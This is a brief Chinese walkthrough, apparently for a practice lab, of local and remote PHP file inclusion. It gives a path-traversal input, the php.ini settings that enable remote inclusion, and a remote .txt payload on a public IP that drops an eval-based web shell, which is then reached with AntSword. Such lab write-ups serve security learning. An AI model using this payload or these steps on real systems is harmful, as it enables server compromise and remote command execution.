1.File inclusion(local)(本地文件包含)
步骤一:选择一个球员提交
步骤二:filename后面输入../../../../shw.php访问php文件
2.File Inclusion(remote)(远程文件包含)
步骤一:修改配置
远程包含漏洞的前提:需要php.ini配置如下:
allow_url_fopen=on //默认打开
Allow_url_include=on //默认关闭
步骤二:选择一个球员提交
步骤三:宝塔公网上创建一个6.txt文件,里面输入<?php fputs(fopen("shw.php","w"),'<?php eval($_POST["cmd"]);?>')?>
步骤四:filename后面输入http://47.113.231.0/6.txt
步骤五:fileinclude目录下找到php文件
步骤六:访问php文件,蚁剑连接
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明原文出处。如若内容造成侵权/违法违规/事实不符,请联系SD编程学习网:675289112@qq.com进行投诉反馈,一经查实,立即删除!